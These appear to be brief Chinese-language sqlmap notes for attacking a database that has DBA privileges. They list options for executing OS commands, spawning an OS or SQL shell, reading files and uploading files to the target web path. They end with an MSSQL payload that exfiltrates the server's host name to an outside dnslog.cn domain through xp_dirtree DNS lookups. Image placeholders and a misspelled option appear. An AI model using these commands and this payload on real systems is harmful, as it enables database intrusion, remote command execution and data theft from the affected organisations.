如果权限是dba就可以使用系统命令
    —os-cmd=”whoami” 执行命令
    —os-shell 调出shell控制台
    读写文件
    —file-read=”文件路径” 读文件
    —file-weite 上传文件路径 —file-dest 目标网站路径 上传文件到目标地址
    image.png
    sqlmap dnslog注入
    这种情况适合使用没有回显的时,使用注入把数据发送到远程dnslog上。
    —sql-shell 调用 sql交互shell
    declare @s varchar(5000),@host varchar(5000) set @s=(host_name()) set
    @host=CONVERT(varchar(5000),@s)+’.2kbg3j.dnslog.cn’;EXEC(‘master..xp_dirtree “\‘+@host+’\foobar$”‘)
    image.png